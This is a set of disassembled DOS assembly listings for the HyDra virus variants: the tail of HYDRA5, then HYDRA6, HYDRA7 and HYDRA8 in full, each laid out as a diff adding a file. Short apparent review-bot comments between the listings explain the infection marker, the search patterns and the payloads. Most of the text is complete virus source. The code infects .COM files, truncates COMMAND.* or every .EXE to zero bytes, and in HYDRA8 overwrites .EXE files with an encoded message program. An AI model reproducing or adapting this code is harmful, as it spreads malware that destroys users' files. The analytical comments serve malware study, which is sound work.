aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
inc bp
pop ax
inc bp
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add ds:data_1e[bx+si],bh
push ax
push cs
pushf ; Push flags
mov cl,13h
mov dx,201h
push cs
pop ds
jmp dword ptr data_14
mov ah,4Ch ; 'L'
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
data_14 dd 000C0h
db 0CDh, 20h
loc_7:
xor di,di ; Zero register
mov si,265h
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_7,0
mov word ptr cs:data_7+2,es
pop bx
jmp dword ptr cs:data_7
push ds
pop es
mov cx,0FFFFh
mov si,287h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra5 endp
seg_a ends
end start
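Review bot: Two stretches of this listing are data that the disassembler printed as instructions, which hides the variant's infection marker and a filename template from anyone reading it. The three lines after `jmp loc_1` (`pop cx` / `inc sp` / `add [bx+si],al`) encode 59h 44h 00h 00h, the 'YD' word that `cmp word ptr ds:data_18e,4459h` tests at read-buffer offset 3 (187h + 3) to skip files already marked. HYDRA8 lists the same bytes as `db 59h, 44h, 00h, 00h`, and a comment such as `; 'YD' marker at file offset 3, usable as a scan signature` belongs on that line. The run from `inc word ptr [bx+si]` to `add ds:data_1e[bx+si],bh` looks like a record containing '????????EXE' (each `aas` is 3Fh, and `inc bp` / `pop ax` / `inc bp` are 'E', 'X', 'E'), so it should be emitted as `db` as well. The HYDRA4 tail above and the HYDRA6 and HYDRA7 sections repeat the marker-as-code artifact.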
@@ -0,0 +1,174 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA6 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_14e equ 174h
data_15e equ 177h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra6 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-6 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_11 db 'COMMAND.*', 0
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,174h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_14e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,174h
mov cs:data_8,ax
cmp word ptr ds:data_15e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_8
nop
loc_6:
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
push dx
mov dx,offset data_11 ; ('COMMAND.*')
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_7:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_10
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_5 ; Jump if carry Set
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_5 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_7 ; Jump if carry=0
loc_8:
xor di,di ; Zero register
mov si,252h
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,274h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra6 endp
seg_a ends
end start
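Review bot: The `loc_6`/`loc_7` path has no comment stating its effect, and the generated per-interrupt comments do not make it obvious. Once the `*.CO?` search is exhausted, it searches for `COMMAND.*` (`data_11`) and issues AH=3Ch create/truncate with CX=0 on each name returned in the DTA (`data_10`), then closes the handle, so every match is left at zero length. A block comment above `loc_6` such as `; payload: truncates each COMMAND.* match to 0 bytes (AH=3Ch); nothing is written back` would let an analyst assess impact and recovery without tracing the loop. HYDRA7 has the same loop against a different pattern.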
@@ -0,0 +1,175 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA7 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_16e equ 170h
data_17e equ 173h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra7 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_4 db 'HyDra-7 Beta - Not For Release'
db '. *.CO?'
db 0
data_7 dw 0, 8B39h
data_9 dw 0
data_10 db 0
db 29 dup (0)
data_11 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_12 db 2Ah
db 2Eh, 45h, 58h, 45h, 00h
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,170h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_4+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_16e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,170h
mov cs:data_9,ax
cmp word ptr ds:data_17e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_9
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_8
nop
loc_6:
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
push dx
mov dx,offset data_12
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_7:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_5 ; Jump if carry Set
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_5 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_7 ; Jump if carry=0
loc_8:
xor di,di ; Zero register
mov si,24Eh
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_7,0
mov word ptr cs:data_7+2,es
pop bx
jmp dword ptr cs:data_7
push ds
pop es
mov cx,0FFFFh
mov si,270h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra7 endp
seg_a ends
end start
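Review bot: `data_12` is a search pattern written as hex (`db 2Ah` / `db 2Eh, 45h, 58h, 45h, 00h`), which decodes to '*.EXE' followed by a NUL, and nothing in the listing says so. HYDRA6 writes its equivalent as `db 'COMMAND.*', 0`, and the same form fits here: `data_12 db '*.EXE', 0`. That makes it visible that the `loc_6`/`loc_7` loop applies AH=3Ch create/truncate to every .EXE match rather than to one named file. `data_13` in the HYDRA8 section is the same byte sequence.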
@@ -0,0 +1,220 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA8 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 28-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: W ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_17e equ 1EFh
data_18e equ 1F2h
data_19e equ 9D9Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra8 proc far
start:
jmp loc_3
db 59h, 44h, 00h, 00h
data_3 db 'HyDra-8 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 18 dup (0)
data_10 db 0
db 10 dup (0)
data_11 db 0
db 0, 0, 0, 0, 0, 0
data_12 db 0
db 0, 0, 0, 0, 0, 0
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_13 db 2Ah
db 2Eh, 45h, 58h, 45h, 00h
data_14 db 33h
db 0C9h, 1Eh, 52h,0E8h, 06h, 00h
db 0E8h, 13h, 00h,0EBh, 36h, 90h
db 0BEh, 48h, 01h
db 0BFh, 5Ah, 01h,0B9h, 12h, 00h
locloop_1:
xor byte ptr [si],0F5h
movsb ; Mov [si] to es:[di]
loop locloop_1 ; Loop if cx > 0
retn
db 0B8h, 00h, 0Fh,0CDh, 10h,0B4h
db 00h,0CDh, 10h,0B8h, 00h, 02h
db 0B6h, 0Ch,0B2h, 1Fh,0CDh, 10h
db 33h,0D2h
db 0BAh, 5Ah, 01h,0B4h, 09h,0CDh
db 21h,0B8h, 00h, 02h,0B6h, 18h
db 0B2h, 00h,0CDh, 10h,0C3h
db 0B8h, 00h, 4Ch,0CDh, 21h, 00h
db 0A2h, 9Dh, 9Ah,0F5h, 9Ch, 86h
db 0F5h
db 0BFh, 9Ah, 9Dh, 9Bh,0F5h,0B2h
db 94h, 99h, 81h,0CAh,0D1h
loc_3:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,1EFh
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_7 ; Jump if carry Set
loc_4:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_17e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,1EFh
mov cs:data_8,ax
cmp word ptr ds:data_18e,4459h
jne loc_5 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_8 ; Jump if carry Set
jmp short loc_4
loc_5:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_6 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_6:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_7:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_11
db 90h
loc_8:
clc ; Clear carry flag
xor cx,cx ; Zero register
push ds
push dx
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov dx,offset data_13
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_7 ; Jump if carry Set
loc_9:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_7 ; Jump if carry Set
mov ax,3D02h
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
clc ; Clear carry flag
xor dx,dx ; Zero register
mov ah,40h ; '@'
mov dx,offset data_14
mov cx,5Ah
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
cmp ax,5Ah
jb loc_10 ; Jump if below
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_10 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_9 ; Jump if carry=0
loc_10:
mov ax,4C00h
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
loc_11:
xor di,di ; Zero register
mov si,offset data_15
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
data_15 db 1Eh
db 07h,0B9h,0FFh,0FFh,0BEh,0EFh
db 02h,0BFh, 00h, 01h, 2Bh,0CEh
db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h
db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh
db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh
db 2Eh, 00h, 01h,0CDh
db 20h
hydra8 endp
seg_a ends
end start
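Review bot: `data_14` is the 5Ah-byte block that the `loc_9` loop writes into each `*.EXE` match after truncating it (`mov dx,offset data_14` / `mov cx,5Ah` / AH=40h), but it is listed as uncommented `db` bytes with only `locloop_1` decoded, so the replacement file's content cannot be read from the listing. Decoded by hand, the bytes appear to be a small program that XORs the 12h bytes at its offset 48h (the run starting `0A2h, 9Dh, 9Ah`) with 0F5h, prints the result with INT 21h AH=09h and exits through AH=4Ch. A comment block saying that, and marking the encoded run as text, is worth adding because a plain string scan will not find the message. `data_15` is likewise the routine that `loc_11` copies and that the other variants show as instructions after their `jmp dword ptr`, and it deserves a one-line comment saying so.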